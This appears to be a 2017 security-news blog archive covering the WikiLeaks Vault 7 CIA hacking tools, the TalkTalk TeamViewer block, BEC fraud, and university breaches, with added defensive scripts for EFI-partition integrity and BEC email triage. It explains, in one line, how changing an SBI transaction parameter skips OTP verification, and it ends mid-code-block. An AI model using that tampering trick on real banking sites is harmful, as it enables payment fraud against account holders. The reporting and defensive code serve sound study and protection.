Wednesday 29 March 2017

WikiLeaks publishes second part of CIA dump

WikiLeaks has recently begun publishing a series of leaks codenamed Vault 7, containing details on the hacking work of the Central Intelligence Agency (CIA). On March 23 it published the second batch of documents, dubbed "Dark Matter".

The Dark Matter documents describe several CIA projects for infecting Apple hardware (Mac, iPhone) with persistent malware. Because the malware lives in the device's firmware, it survives a reinstall of the operating system.

The first publication, known as "Year Zero", contained 8,761 documents and files. Most of the documents came from an isolated, high-security network inside the CIA's Center for Cyber Intelligence in Langley, Virginia.

One of the tools is called Sonic Screwdriver, described as a mechanism for executing code from a peripheral device while a Mac is booting. It gives an attacker with physical access a way to run their own code before the operating system has loaded.

According to the documents, the CIA stored the malicious code on modified Thunderbolt-to-Ethernet adapters. Another project, "DarkSeaSkies", is an implant for the EFI firmware of the Apple MacBook Air; it bundles three components, DarkMatter (EFI), SeaPea (kernel space) and NightSkies (user space).

After WikiLeaks published the first part of the dump, an Apple representative said the bugs had already been fixed in the current releases and there was nothing to worry about. Apple has so far been silent on the second dump.

Sunday 12 March 2017

Brit ISP TalkTalk blocks control tool TeamViewer

To stop scammers fooling people into using the software and handing over their PCs

TalkTalk has blocked remote desktop management tool TeamViewer from its network, following a spate of scammers using the software to defraud customers.
A spokeswoman for the UK ISP confirmed it had blocked "a number of sites and applications" including TeamViewer from its network to protect customers from phishing and scamming activities.
The company said it was working with TeamViewer and other third parties on additional security measures.
TeamViewer is one of the most popular pieces of software to enable remote access. It was also used by hundreds of scammers attempting to defraud TalkTalk customers by gaining remote access to their computers.
TeamViewer has previously said it takes the security and privacy of its customers "extremely seriously" and "condemns the use of TeamViewer to subvert systems and gain unauthorised access to private data."
Customers complained on TalkTalk's forum this afternoon they were unable to use the software.
One said they spent the whole morning trying to fix the problem, using three different computers which failed to connect to TeamViewer via TalkTalk's SuperRouter.
"I tried to connect by tethering my computer to iPhone 4G - and it connected to TeamViewer straight away. [When I went] back to router [I] lost connection. Loads of reports on the internet about no connection via TalkTalk - why are they blocking it?"
Another said: "This is completely unsatisfactory. If this can't be resolved then I'll have no alternative but to switch ISP and also recommend that my main clients do also."
In the forum, TalkTalk noted that the number of complaints it receives from customers about fraud carried out through these tools "is significant", but said it hoped to resolve the issue with TeamViewer and the other third-party wares affected.
The ISP's spokeswoman said: “We constantly monitor for potentially malicious internet traffic, so that we can protect our customers from phishing and scamming activities.
"As part of this work, we have recently blocked a number of sites and applications from our network, and we’re working hard to minimise the impact on our customers.
“We would also urge our customers to visit our Beat the Scammers website to find out more about how they can keep themselves safe online.”

That CIA exploit list in full: The good, the bad, and the very ugly

We're still going through the 8,761 CIA documents published on Tuesday by WikiLeaks for political mischief, although here are some of the highlights.
First, though, a few general points: one, there's very little here that should shock you. The CIA is a spying organization, after all, and, yes, it spies on people.
Two, unlike the NSA, the CIA isn't mad keen on blanket surveillance: it targets particular people, and the hacking tools revealed by WikiLeaks are designed to monitor specific persons of interest. For example, you may have seen headlines about the CIA hacking Samsung TVs. As we previously mentioned, that involves breaking into someone's house and physically reprogramming the telly with a USB stick. If the CIA wants to bug you, it will bug you one way or another, smart telly or no smart telly. You'll probably be tricked into opening a dodgy attachment or download.
That's actually a silver lining to all this: end-to-end encrypted apps, such as Signal and WhatsApp, are so strong, the CIA has to compromise your handset, TV or computer to read your messages and snoop on your webcam and microphones, if you're unlucky enough to be a target. Hacking devices this way is fraught with risk and cost, so only highly valuable targets will be attacked. The vast, vast majority of us are not walking around with CIA malware lurking in our pockets, laptop bags, and living rooms.
Thirdly, if you've been following US politics and WikiLeaks' mischievous role in the rise of Donald Trump, you may have clocked that Tuesday's dump was engineered to help the President pin the hacking of his political opponents' email server on the CIA. The leaked documents suggest the agency can disguise its operations as the work of a foreign government. Thus, it wasn't the Russians who broke into the Democrats' computers and, by leaking the emails, helped swing Donald the election – it was the CIA all along, Trump can now claim. That'll shut the intelligence community up. The President's pet news outlet Breitbart is already running that line.
Back to the leaked files. One amusing page gives details of discussions within the CIA on how to avoid having its secrets leak in the wake of the theft of the NSA Equation Group's hacking tools. Along with a detailed report [PDF] on the Equation Group hack, there are suggestions on how to protect resources.
The CIA and the White House have yet to comment on the veracity of the leaked material and are unlikely to do so. But at least one former intelligence worker with knowledge of such matters seems convinced they are real.
So here's a rundown of the highlights so far. With so much material to go through, some important things will have been missed. Feel free to add your own insights in the comments section. We note that a good number of these cyber-weapons were obtained from the NSA, GCHQ or private computer security researchers, and hoarded without warning vendors in case vulnerabilities are patched – we've covered this subject over and over.
  • Windows: The CIA's UMBRAGE team has a modest collection of attack tools for systems powered by Microsoft's widely used operating system, all listed in the dump. These tools include keystroke loggers, sandbox escapes, and antivirus evasion mechanisms. The CIA analysts found flaws in Control Panel, and documented the use of NTFS alternate data streams to smuggle data onto storage drives without detection. Windows library files are useful stepping stones to malicious code execution, as are Windows Theme files. DLL files [PDF] are a popular attack vector for the CIA. They are also handy for concealing malware in applications, and the documents show that common apps have been used for spying by exploiting DLL weaknesses.
    One DLL attack technique shows that someone at the agency is a bit of a Will Ferrell fan. The RickyBobby program, named after the character in the film Talladega Nights, uses several .NET DLLs and a Windows PowerShell script to implant a "listening post" on a target Windows PC.
    A version has been used in the field on USB drives, according to one document. The software, with attack tools dubbed Fight Club, was put onto six thumb drives and "inserted into the supply chain of a target network/group."
    If you're using Microsoft Exchange 2010, the CIA has a tool for that, dubbed ShoulderSurfer. This performs a code injection attack against the Exchange Datastore manager process that would allow an agent to collect emails and contacts at will, without needing an individual's credentials.
    Exchange 2007 is even easier to crack, according to the CIA. For a detailed rundown on Exchange and all its flaws, this document [PDF] should be helpful to Microsoft engineers looking to fix the problems.
  • OS X: Users of Apple's OS X shouldn't look too smug, however. The CIA has tools for you too – pages of them. A lot of hacking tools cover OS X El Capitan, but presumably these have been updated to subvert new versions of the operating system. That said, it does seem through reading these files that Apple poses a significantly more difficult challenge for the CIA than Redmond's code.
    Analysts note that the operating system can be resilient to applications that try to slip malware onto a Mac. But it's still possible to whitelist spying software; subvert NetInstall images, creating zombie programs; and surreptitiously get at the kernel.
    One interesting project the files touch on is dubbed QuarkMatter. This is a technique for hiding spying software persistently on an OS X system by using an EFI driver stored on the EFI system partition. Another, dubbed SnowyOwl, uses a pthread in an OpenSSH client to potentially pull off remote monitoring of a target system.
    The documents also show a project called HarpyEagle that analyzed Apple's Airport Extreme firmware for private keys, and also Time Capsule systems.
  • iOS: The CIA files show an extensive list of iOS exploits. Some of these were developed in-house, some obtained from the NSA or Britain's GCHQ, and others were purchased from private vendors. It looks as though at least some of the security bugs were fixed by Apple in recent iOS updates – versions 8 and later – or are otherwise no longer exploitable. For instance, the Redux sandbox workaround and Xiphos kernel exploit were both used to hack "iPhone 4S and later, iPod touch (5th generation) and later, iPad 2 and later," but both flaws were fixed after being publicized by the Chinese jailbreaker Pangu. While it's likely the exploit list is an old one, a lot of them may still work. iOS 8 appears to have killed off a few, but most of the exploits don't have death dates listed.
    The Dyonedo exploit, developed by GCHQ, allows unsigned code to run on iOS devices, while the CIA's homegrown Persistence tool allows "a symbolic link [to] be created (on iOS 7.x) or an existing file can be overwritten (iOS 8.x) that will run our bootstrapper, giving [users] initial execution on every boot."
    While full root is a goal, the documents also detail an attack known as Captive Portal. This sets up the browser to route all web use through a server run by the CIA.
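The EFI-resident persistence mentioned above for QuarkMatter (an EFI driver dropped on the EFI System Partition) and, earlier on this page, for DarkSeaSkies/DarkMatter (an implant in the MacBook Air's EFI firmware) is what a practitioner most wants to be able to check for. The script below is an added example, not code from the leaked documents or from any vendor. It takes a baseline manifest of every file on a mounted ESP and later diffs a fresh manifest against it, flagging new EFI binaries and modified boot loaders. The ESP layout it builds for the demonstration is constructed and hypothetical. The caveat: this only sees files on the partition, which is where a QuarkMatter-style driver lands; an implant written into the SPI flash itself (the DarkMatter approach) is invisible here, and for that the firmware image has to be dumped and compared against the vendor's.

```python
"""Baseline-and-diff integrity check for files on an EFI System Partition (ESP).

Added example, not code from the leaked documents. It flags files that appeared
or changed on the ESP since a trusted baseline was taken, which is where a
QuarkMatter-style EFI driver would land. An implant written into the SPI flash
itself (the DarkMatter/DarkSeaSkies approach) is invisible to this check.
"""
import hashlib
import os
import tempfile
from typing import Dict, List

Manifest = Dict[str, str]


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str) -> Manifest:
    """Map every file under root (relative path, '/'-separated) to its SHA-256."""
    out: Manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            out[rel] = sha256_file(full)
    return out


def diff_manifests(baseline: Manifest, current: Manifest) -> Dict[str, List[str]]:
    """Report what is new, missing or modified relative to the baseline."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "changed": sorted(p for p in common if baseline[p] != current[p]),
    }


def esp_findings(delta: Dict[str, List[str]]) -> List[str]:
    """Turn a diff into triage notes: a new EFI executable is the headline
    indicator, a changed boot loader or driver is the other."""
    notes: List[str] = []
    for p in delta["added"]:
        notes.append(("NEW EFI BINARY: " if p.lower().endswith(".efi") else "new file: ") + p)
    for p in delta["changed"]:
        notes.append("MODIFIED: " + p)
    for p in delta["removed"]:
        notes.append("missing: " + p)
    return notes


def build_demo_esp(root: str, implant: bool) -> None:
    """Constructed, hypothetical stand-in for an ESP layout (not a real vendor tree)."""
    files = {
        "EFI/APPLE/FIRMWARE/capsule.scap": b"vendor firmware capsule (fake bytes)",
        "EFI/BOOT/BOOTX64.EFI": b"stock boot loader (fake bytes)",
    }
    if implant:
        # the kind of drop a QuarkMatter-style persistence would leave behind
        files["EFI/DRIVERS/rogue.efi"] = b"rogue EFI driver (fake bytes)"
        files["EFI/BOOT/BOOTX64.EFI"] = b"stock boot loader (fake bytes) + patched"
    for rel, data in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)


def demo() -> List[str]:
    """Take a baseline of a clean tree, then diff an implanted one against it."""
    with tempfile.TemporaryDirectory() as clean, tempfile.TemporaryDirectory() as later:
        build_demo_esp(clean, implant=False)
        build_demo_esp(later, implant=True)
        baseline = build_manifest(clean)
        return esp_findings(diff_manifests(baseline, build_manifest(later)))


if __name__ == "__main__":
    # Real use: persist build_manifest(<esp mountpoint>) as JSON while the machine
    # is known good, and diff a fresh manifest against it on every check.
    for line in demo():
        print(line)
```

In real use, mount the ESP read-only (on macOS `diskutil list` shows it as the EFI partition, typically disk0s1; on Linux it is usually already at /boot/efi), point `build_manifest` at the mountpoint and store the result while the machine is known good. Diff against that stored baseline after any event that warrants it, and treat any new `.efi` file or changed boot loader as something to pull and analyse rather than delete.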

Cybercrime even has its own religion in Ghana

Nigerian prince
Spoofed email and malware hidden in attachments netted crooks in West Africa more than $3bn in three years from businesses.
That's according to research carried out by the International Criminal Police Organization (Interpol) and infosec biz Trend Micro. Forget claims of money stuck in bank accounts. Scammers are now raking it in from so-called business email compromise (BEC) schemes, according to the security team.
A BEC crook sends authentic-looking invoices and internal memos to businesses and their finance staff, tricking the employees into paying money into the thieves' accounts. The messages can also be booby-trapped with malware that infects work PCs and logs key-strokes. This information is then used to log into the company's online bank account, and transfer money to criminals' pockets.
The Interpol-Trend study found that between October 2013 and May 2016, BEC scammers walked off with more than $3bn having exploited the technique globally.
Such frauds are becoming a serious pain in the fundament: the FBI warned last year that they had siphoned over $1bn from American companies. Victims of BEC scams included the city of El Paso, in Texas, America, which got scammed out of $3.2m, and Austrian engineering firm FACC, which lost over $54m. Much of the money in both cases has now been recovered – but by no means all of it, and the problem is getting worse.
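The BEC scheme described above relies on a message that looks like it comes from a known executive or supplier while replies and payments are routed elsewhere. The script below is an added example, not code from the Interpol/Trend Micro report, showing the header and content checks a mail-security team would run on an inbound message: executive display-name impersonation, a Reply-To domain that differs from the apparent sender, a lookalike (typo-squatted or homoglyph) sender domain, and payment-pressure language. The protected organisation (`example-corp.com`), the executive names and both sample messages are constructed for the demonstration.

```python
"""Heuristic triage of an inbound message for business-email-compromise (BEC)
indicators: executive display-name impersonation, a Reply-To pointing somewhere
other than the apparent sender, a lookalike sender domain, and payment-pressure
language. Added example; the organisation, names and messages are constructed."""
from email import message_from_string
from email.utils import parseaddr
from typing import List, Optional

# Hypothetical organisation being protected (assumption for the example).
TRUSTED_DOMAINS = {"example-corp.com"}
PROTECTED_NAMES = {"jane doe", "john smith"}  # executives scammers impersonate
PRESSURE_PHRASES = ("wire transfer", "bank details", "urgent", "new account",
                    "keep this confidential")


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot typo-squatted domains (exarnple vs example)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def domain_of(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def lookalike_of(domain: str) -> Optional[str]:
    """Return the trusted domain this sender domain imitates, if any."""
    if not domain or domain in TRUSTED_DOMAINS:
        return None
    # undo the usual visual substitutions before comparing
    normalised = (domain.replace("rn", "m").replace("vv", "w")
                        .replace("0", "o").replace("1", "l"))
    for trusted in TRUSTED_DOMAINS:
        if normalised == trusted or levenshtein(domain, trusted) <= 2:
            return trusted
    return None


def bec_indicators(raw_message: str) -> List[str]:
    """Return the BEC indicators found in a raw RFC 5322 message."""
    msg = message_from_string(raw_message)
    findings: List[str] = []

    display_name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = domain_of(from_addr)
    if display_name.strip().lower() in PROTECTED_NAMES and from_domain not in TRUSTED_DOMAINS:
        findings.append(f"display-name impersonation: '{display_name}' from {from_domain}")

    imitated = lookalike_of(from_domain)
    if imitated:
        findings.append(f"lookalike sender domain {from_domain} imitates {imitated}")

    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    if reply_addr and domain_of(reply_addr) != from_domain:
        findings.append(f"Reply-To domain {domain_of(reply_addr)} differs from From domain {from_domain}")

    body = msg.get_payload(decode=True) or b""
    text = (msg.get("Subject", "") + "\n" + body.decode("utf-8", "replace")).lower()
    hits = [p for p in PRESSURE_PHRASES if p in text]
    if len(hits) >= 2:
        findings.append("payment-pressure language: " + ", ".join(hits))
    return findings


# Constructed samples, not real traffic.
SPOOFED_MESSAGE = """\
From: Jane Doe <jane.doe@exarnple-corp.com>
Reply-To: accounts@mail-relay.example.net
To: finance@example-corp.com
Subject: Urgent wire transfer

Please pay the attached invoice today. Our bank details have changed.
"""

LEGIT_MESSAGE = """\
From: Jane Doe <jane.doe@example-corp.com>
To: finance@example-corp.com
Subject: Q1 report

Please find the Q1 summary attached.
"""

if __name__ == "__main__":
    for label, sample in (("spoofed", SPOOFED_MESSAGE), ("legit", LEGIT_MESSAGE)):
        print(label, bec_indicators(sample) or ["no indicators"])
```

None of these checks is conclusive on its own; a legitimate message can carry one of them. The point is that a BEC lure typically trips several at once, and that the finance team's call-back to a known-good phone number is the control that actually stops the payment.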
"West African cybercriminals are clearly shifting to more elaborate crimes, complex operations, and business models – BEC and tax fraud, in particular," the report [PDF] states.
"Armed with their social engineering expertise and ingenuity, and augmented by tools and services (keyloggers, RATs, crypters, counter-AV services, etc), West African cybercriminals are stealing large amounts of money via crimes targeting individuals and companies worldwide."
Quite why West Africa is such a hotspot for online crime isn't hard to work out – education and motive. Around half of all university graduates in West Africa are unemployed a year after graduation and so the lure of crime is strong.
It's now so established in some cultures that it has entered the pantheon of religion in Ghana, under the name Sakawa. The fraudsters make offerings to a supreme being that will protect their fraud from being discovered and ensure good fortune.
The study identified two big gangs working in the regions. The first, known as the Yahoo! Boys, concentrate largely on the traditional types of fraud like 419 scams – where an online figure (typically a bogus Nigerian prince or foreign lawyer) promises a big payout if the victim coughs up fees to free up the supposed fortune.
The Yahoo! Boys – so named because until recently they used the failing portal's chat tools to coordinate their scams – also carry out romance scams, forming faux relationships with the lonely and then 'borrowing' money for plane tickets to consummate the relationship. Another is the so-called "send money" scam, whereby they pretend to be a foreign traveler who has been mugged and needs funds from friends and family.
Typically members of the Yahoo! Boys are in their twenties, like to show off their wealth on social media, and operate in small, local groups. While their methods of fraud are relatively unsophisticated, they still make a good living.
More dangerous are what the study calls next-level cybercriminals. This group is generally older, doesn't show off their wealth, and operates in a more sophisticated way. It concentrates on BEC fraud and also harvests financial details to scam funds from victims with fake tax returns.
Next-level cybercriminals are highly professional, running money-laundering operations, a network of money mules, and working closely with relatives in the target countries to smooth out the scamming process. It's this group that has been raking in the billions.
Interpol reports some limited success in shutting down these groups, but says that for all the tips they pass on to local police, only about 30 per cent end up in an arrest. As ever with online crime, finding the physical location of the criminals is a major issue.

WikiLeaks Dumps Docs on CIA’s Hacking Tools

WikiLeaks on Tuesday dropped one of its most explosive word bombs ever: A secret trove of documents apparently stolen from the U.S. Central Intelligence Agency (CIA) detailing methods of hacking everything from smart phones and TVs to compromising Internet routers and computers. KrebsOnSecurity is still digesting much of this fascinating data cache, but here are some first impressions based on what I’ve seen so far.
First, to quickly recap what happened: In a post on its site, WikiLeaks said the release — dubbed “Vault 7” — was the largest-ever publication of confidential documents on the agency. WikiLeaks is promising a series of these document caches; this first one includes more than 8,700 files allegedly taken from a high-security network inside CIA’s Center for Cyber Intelligence in Langley, Va.
The home page for the CIA's "Weeping Angel" project, which sought to exploit flaws that could turn certain 2013-model Samsung "smart" TVs into remote listening posts.
“Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized ‘zero day’ exploits, malware remote control systems and associated documentation,” WikiLeaks wrote. “This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive.”
Wikileaks said it was calling attention to the CIA’s global covert hacking program, its malware arsenal and dozens of weaponized exploits against “a wide range of U.S. and European company products, includ[ing] Apple’s iPhone, Google’s Android and Microsoft’s Windows and even Samsung TVs, which are turned into covert microphones.”
The documents for the most part don’t appear to include the computer code needed to exploit previously unknown flaws in these products, although WikiLeaks says those exploits may show up in a future dump. This collection is probably best thought of as an internal corporate wiki used by multiple CIA researchers who methodically found and documented weaknesses in a variety of popular commercial and consumer electronics.
For example, the data dump lists a number of exploit “modules” available to compromise various models of consumer routers made by companies like Linksys, MikroTik and Zyxel, to name a few. CIA researchers also collated several pages worth of probing and testing weaknesses in business-class devices from Cisco, whose powerful routers carry a decent portion of the Internet’s traffic on any given day. Craig Dods, a researcher with Cisco’s rival Juniper, delves into greater detail on the Cisco bugs for anyone interested (Dods says he found no exploits for Juniper products in the cache, yet). Meanwhile, Cisco has published its own blog post on the matter.

WHILE MY SMART TV GENTLY WEEPS

Some of the exploits discussed in these leaked CIA documents appear to reference full-on, remote access vulnerabilities. However, a great many of the documents I’ve looked at seem to refer to attack concepts or half-finished exploits that may be limited by very specific requirements — such as physical access to the targeted device.
The “Weeping Angel” project’s page from 2014 is a prime example: It discusses ways to turn certain 2013-model Samsung “smart TVs” into remote listening devices; methods for disabling the LED lights that indicate the TV is on; and suggestions for fixing a problem with the exploit in which the WiFi interface on the TV is disabled when the exploit is run. The page's own to-do list reads:
ToDo / Future Work:
  • Build a console cable
  • Turn on or leave WiFi turned on in Fake-Off mode
  • Parse unencrypted audio collection
  • Clean-up the file format of saved audio. Add encryption??
According to the documentation, Weeping Angel worked as long as the target hadn’t upgraded the firmware on the Samsung TVs. It also said the firmware upgrade eliminated the “current installation method,” which apparently required the insertion of a booby-trapped USB device into the TV.
Don’t get me wrong: This is a serious leak of fairly sensitive information. And I sincerely hope Wikileaks decides to work with researchers and vendors to coordinate the patching of flaws leveraged by the as-yet unreleased exploit code archive that apparently accompanies this documentation from the CIA.
But in reading the media coverage of this leak, one might be led to believe that even if you are among the small minority of Americans who have chosen to migrate more of their communications to privacy-enhancing technologies like Signal or WhatsApp, it’s all futility because the CIA can break it anyway.
Perhaps a future cache of documents from this CIA division will change things on this front, but an admittedly cursory examination of these documents indicates that the CIA’s methods for weakening the privacy of these tools all seem to require attackers to first succeed in deeply subverting the security of the mobile device — either through a remote-access vulnerability in the underlying operating system or via physical access to the target’s phone.
As Bloomberg’s tech op-ed writer Leonid Bershidsky notes, the documentation released here shows that these attacks are “not about mass surveillance — something that should bother the vast majority of internet users — but about monitoring specific targets.”
By way of example, Bershidsky points to a tweet yesterday from Open Whisper Systems (the makers of the Signal private messaging app) which observes that, “The CIA/Wikileaks story today is about getting malware onto phones, none of the exploits are in Signal or break Signal Protocol encryption.”
The company went on to say that because more online services are now using end-to-end encryption to prevent prying eyes from reading communications that are intercepted in-transit, intelligence agencies are being pushed “from undetectable mass surveillance to expensive, high-risk, targeted attacks.”
A tweet from Open Whisper Systems, the makers of the popular mobile privacy app Signal.
As limited as some of these exploits appear to be, the methodical approach of the countless CIA researchers who apparently collaborated to unearth these flaws is impressive and speaks to a key problem with most commercial hardware and software today: The vast majority of vendors would rather spend the time and money marketing their products than embark on the costly, frustrating, time-consuming and continuous process of stress-testing their own products and working with a range of researchers to find these types of vulnerabilities before the CIA or other nation-state-level hackers can.
Of course, not every company has a budget of hundreds of millions of dollars just to do basic security research. According to this NBC News report from October 2016, the CIA’s Center for Cyber Intelligence (the alleged source of the documents discussed in this story) has a staff of hundreds and a budget in the hundreds of millions: Documents leaked by NSA whistleblower Edward Snowden indicate the CIA requested $685.4 million for computer network operations in 2013, compared to $1 billion by the U.S. National Security Agency (NSA).

TURNABOUT IS FAIR PLAY?

NBC also reported that the CIA’s Center for Cyber Intelligence was tasked by the Obama administration last year to devise cyber attack strategies in response to Russia’s alleged involvement in the siphoning of emails from Democratic National Committee servers as well as from Hillary Clinton‘s campaign chief John Podesta. Those emails were ultimately published online by Wikileaks last summer.
NBC reported that the “wide-ranging ‘clandestine’ cyber operation designed to harass and ’embarrass’ the Kremlin leadership was being led by the CIA’s Center for Cyber Intelligence.” Could this attack have been the Kremlin’s response to an action or actions by the CIA’s cyber center? Perhaps time (or future leaks) will tell.
Speaking of the NSA, the Wikileaks dump comes hot on the heels of a similar disclosure by The Shadow Brokers, a hacking group that said it stole malicious software from the Equation Group, a highly-skilled and advanced threat actor that has been closely tied to the NSA.
What’s interesting is this Wikileaks cache includes a longish discussion thread among CIA employees who openly discuss where the NSA erred in allowing experts to tie the NSA’s coders to malware produced by the Equation Group. As someone who spends a great deal of time unmasking cybercriminals who invariably leak their identity and/or location through poor operational security, I was utterly fascinated by this exchange.

BUG BOUNTIES VS BUG STOCKPILES

Many are using this latest deluge from WikiLeaks to reopen the debate over whether there is enough oversight of the CIA’s hacking activities. The New York Times called yesterday’s WikiLeaks disclosure “the latest coup for the antisecrecy organization and a serious blow to the CIA, which uses its hacking abilities to carry out espionage against foreign targets.”
The WikiLeaks scandal also revisits the question of whether the U.S. government should instead of hoarding and stockpiling vulnerabilities be more open and transparent about its findings — or at least work privately with software vendors to get the bugs fixed for the greater good. After all, these advocates argue, the United States is perhaps the most technologically-dependent country on Earth: Surely we have the most to lose when (not if) these exploits get leaked? Wouldn’t it be better and cheaper if everyone who produced software sought to crowdsource the hardening of their products?
On that front, my email inbox was positively peppered Tuesday with emails from organizations that run “bug bounty” programs on behalf of corporations. These programs seek to discourage the “full disclosure” approach — e.g., a researcher releasing exploit code for a previously unknown bug and giving the affected vendor exactly zero days to fix the problem before the public finds out how to exploit it (hence the term “zero-day” exploit).
Rather, the bug bounties encourage security researchers to work closely and discreetly with software vendors to fix security vulnerabilities — sometimes in exchange for monetary reward and sometimes just for public recognition.
Casey Ellis, chief executive officer and founder of bug bounty program Bugcrowd, suggested the CIA WikiLeaks disclosure will help criminal groups and other adversaries, while leaving security teams scrambling.
“In this mix there are the targeted vendors who, before today, were likely unaware of the specific vulnerabilities these exploits were targeting,” Ellis said. “Right now, the security teams are pulling apart the Wikileaks dump, performing technical analysis, assessing and prioritizing the risk to their products and the people who use them, and instructing the engineering teams towards creating patches. The net outcome over the long-term is actually a good thing for Internet security — the vulnerabilities that were exploited by these tools will be patched, and the risk to consumers reduced as a result — but for now we are entering yet another Shadow Brokers, Stuxnet, Flame, Duqu, etc., a period of actively exploitable 0-day bouncing around in the wild.”
Ellis said that — in an ironic way, one could say that Wikileaks, the CIA, and the original exploit authors “have combined to provide the same knowledge as the ‘good old days’ of full disclosure — but with far less control and a great many more side-effects than if the vendors were to take the initiative themselves.”
“This, in part, is why the full disclosure approach evolved into the coordinated disclosure and bug bounty models becoming commonplace today,” Ellis said in a written statement. “Stories like that of Wikileaks today are less and less surprising and to some extent are starting to be normalized. It’s only when the pain of doing nothing exceeds the pain of change that the majority of organizations will shift to a proactive vulnerability discovery strategy and the vulnerabilities exploited by these toolkits — and the risk those vulnerabilities create for the Internet — will become less and less common.”
Many observers — including a number of cybersecurity professional friends of mine — have become somewhat inured to these disclosures, and argue that this is exactly the sort of thing you might expect an agency like the CIA to be doing day in and day out. Omer Schneider, CEO at a startup called CyberX, seems to fall into this camp.
“The main issue here is not that the CIA has its own hacking tools or has a cache of zero-day exploits,” Schneider said. “Most nation-states have similar hacking tools, and they’re being used all the time. What’s surprising is that the general public is still shocked by stories like these. Regardless of the motives for publishing this, our concern is that Vault7 makes it even easier for a crop of new cyber-actors to get in the game.”

Sunday 26 February 2017

Microsoft opens Cybersecurity Engagement Center in Mexico

Microsoft has announced the opening of what it calls a Cybersecurity Engagement Center in Mexico. This will join the Transparency and Cybersecurity Center for Asia-Pacific, as well as the one in India, and its Redmond Cybercrime Center.
The complex, based in the country's capital city, will serve Mexico as well as other Latin American countries, in an effort to use technology, experience, and services to protect citizens and companies from an array of cyber threats.
As highlighted in the post, some of the main objectives of this facility are:
  • Taking advantage of Microsoft’s proactive role in matters of fighting cybercrime, particularly in the dismantling of criminal organizations that operate through Botnet schemes
  • Allowing cybersecurity experts from Mexico and elsewhere in Latin America to work with Microsoft specialists to fight cybercrime together
  • Acting as a headquarters for the development of training activities in order to support the building and strengthening of technical capabilities; these activities are geared toward authorities and the public sector
According to Jean-Philippe Courtois, Executive VP and President, Microsoft Global Sales, Marketing and Operations, this newly opened complex will work in tandem with the software giant's Redmond-based Cybercrime Center opened back in 2013. The Cybercrime Center was unveiled after the merger of the digital crimes and software piracy teams, which employed 30 staff at the time, collaborating with over 70 individuals worldwide to locate and fight hacker threats and malware.
Microsoft stated it is committed to invest in Latin America, by bringing over its cybersecurity capabilities to help governments identify "current threats that affect the economy’s prosperity". To make good on its promise, the company will use its "robust and trustworthy cloud computing" platform to fight cyber threats, as it has done in the past.
In concert with the opening of the facility, a Government Security Program was signed between the Redmond giant and the Federal Police (representing the Mexican government) to promote IT security. What this does is it gives participating authorities "access to the source code for current versions of Windows and Windows service packs, Windows Embedded CE, and Microsoft Office".
It is not the first time Microsoft has collaborated with authorities on this issue, as the company helped bring down the ZeroAccess botnet in conjunction with the FBI and Europol a few years ago.

63 Universities and US Government agencies breached by hacker

A “Russian-speaking and notorious financially-motivated” hacker known as Rasputin has reportedly broken into the computer systems of various US universities and government agencies and sold the stolen data on the dark web.

According to the cyber security research firm Recorded Future, the hacker gained access to the computer systems of 63 universities and federal, state, and local U.S. government agencies. The prominent universities include Cornell and New York University.

The firm claimed that the victims are “intentional targets of choice based on the organization’s perceived investment in security controls and the respective compromised data value. Additionally, these databases are likely to contain significant quantities of users and potentially associated personally identifiable information (PII).”

The list of Rasputin's targets is long and extends to 10 U.K. universities and one Indian university in Delhi as well. All the hacked agencies and universities have been informed of the breaches by Recorded Future's researchers.

The victims include 16 U.S. state governments, 6 U.S. cities and four federal agencies, among them the Child Welfare Information Gateway, which is operated by the U.S. Department of Health and Human Services, and Fermi National Accelerator Laboratory, America’s premier particle physics lab. The severity of the breaches is unclear.

The list of U.S. university victims: Cornell University, University of the Cumberlands, Virginia Tech, Oregon College of Oriental Medicine, University of Maryland, Baltimore County, Humboldt State University, University of Pittsburgh, The University of North Carolina at Greensboro, New York University, University of Mount Olive, Rice University, Michigan State University, University of California, Los Angeles, Rochester Institute of Technology, Eden Theological Seminary, University of Tennessee, Arizona State University, St. Cloud State University, NC State University, University of Arizona, Purdue University, University at Buffalo, Atlantic Cape Community College, University of Washington.

The list of U.K. university victims: University of Cambridge, Coleg Gwent, University of Oxford, University of the Highlands and Islands, Architectural Association School of Architecture, University of Glasgow, University of Chester, the University of the West of England, University of Leeds, The University of Edinburgh.

And one Indian University: Delhi University.

Hackers could easily bypass SBI's OTP security

The One Time Password (OTP) has become a standard security feature on most websites, including those of banks. It allows a user to complete an online transaction only after the customer's identity is verified by entering the OTP that the bank sent to the registered mobile number. But who knew this security feature could be easily bypassed and lead to a huge loss of money?

A white-hat hacker, bug bounty hunter and web application security researcher, Neeraj Edwards, shared his research on how he could easily bypass the OTP of one of the most popular banks, State Bank of India (SBI), and complete a transaction of any amount.

While making a transaction, the last page of SBI’s website shows a One Time Password screen where a parameter called smartotpflag is set to Y (i.e. smartotpflag=Y).

The smartotpflag parameter controls OTP generation, and Y represents ‘yes’: send the code to the registered mobile. The risk arises if someone changes ‘Y’ to ‘N’, which means ‘No’. The transaction is then completed without entering the OTP.
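
The flaw described above, as an added illustration that is neither SBI's code nor the researcher's write-up: a handler that lets the client's smartotpflag decide whether the OTP is checked at all, next to a version where the server alone decides, ignores the client flag, and consumes the code after one use. The Session structure, the function names and the constructed request are assumptions made for the example.

```python
"""Client-trusted OTP flag (the SBI report above) and a server-side fix.

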